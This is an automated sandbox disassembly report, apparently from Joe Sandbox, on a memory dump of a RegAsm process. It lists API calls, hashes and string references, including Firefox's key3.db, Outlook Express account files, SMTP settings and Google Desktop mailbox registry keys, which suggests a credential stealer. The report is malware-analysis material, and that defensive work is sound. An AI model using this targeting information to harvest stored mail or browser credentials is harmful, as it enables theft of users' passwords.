                                                                                                                                              • API String ID: 1297977491-2759563040
                                                                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0044955B
                                                                                                                                              • memset.MSVCRT ref: 0044956B
                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: gj
                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                              • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                              • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                              • API String ID: 3337535707-2769808009
                                                                                                                                              • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                              • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                              • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                              • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1189762176-0
                                                                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                              • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                              • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                              • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2374668499-0
                                                                                                                                              • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                              • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                              • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                              • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040AD5B
                                                                                                                                              • memset.MSVCRT ref: 0040AD71
                                                                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                              • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                              Strings
                                                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                              • <%s>, xrefs: 0040ADA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                              • API String ID: 3699762281-1998499579
                                                                                                                                              • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                              • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                              • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                              • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                              • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                              • Opcode Fuzzy Hash: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                              • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                              • free.MSVCRT ref: 00409B00
                                                                                                                                                • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2241099983-0
                                                                                                                                              • Opcode ID: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                              • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                              • Opcode Fuzzy Hash: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                              • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2775283111-0
                                                                                                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                              APIs
                                                                                                                                              • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 2498372239-3993045852
                                                                                                                                              • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                              • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                              • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                              • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                              • API String ID: 885266447-2471937615
                                                                                                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                              • String ID: Ul@$key3.db
                                                                                                                                              • API String ID: 1968906679-1563549157
                                                                                                                                              • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                              • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                              • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                              • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                              APIs
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                                                                              • String ID: smtp
                                                                                                                                              • API String ID: 2625860049-60245459
                                                                                                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                              • memset.MSVCRT ref: 00408258
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                              Strings
                                                                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$EnumOpenmemset
                                                                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                              • API String ID: 2255314230-2212045309
                                                                                                                                              • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                              • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                                                                              • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FocusMessagePostmemset
                                                                                                                                              • String ID: S_@$l
                                                                                                                                              • API String ID: 3436799508-4018740455
                                                                                                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004092C0
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                              Strings
                                                                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                              • API String ID: 408644273-3424043681
                                                                                                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy
                                                                                                                                              • String ID: C^@$X$ini
                                                                                                                                              • API String ID: 714388716-917056472
                                                                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                              • API String ID: 3492281209-168460110
                                                                                                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassName_strcmpimemset
                                                                                                                                              • String ID: edit
                                                                                                                                              • API String ID: 275601554-2167791130
                                                                                                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
